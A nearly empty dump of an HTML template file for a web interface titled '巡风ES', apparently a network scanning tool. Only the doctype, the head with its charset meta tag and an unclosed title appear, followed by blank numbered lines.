--------------------------------------------------------------------------------
/server/templates/index.html:
--------------------------------------------------------------------------------
1 | <!DOCTYPE html>
2 | <html lang="en">
3 | <head>
4 | <meta charset="UTF-8">
5 | <title>巡风ES
6 |
7 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |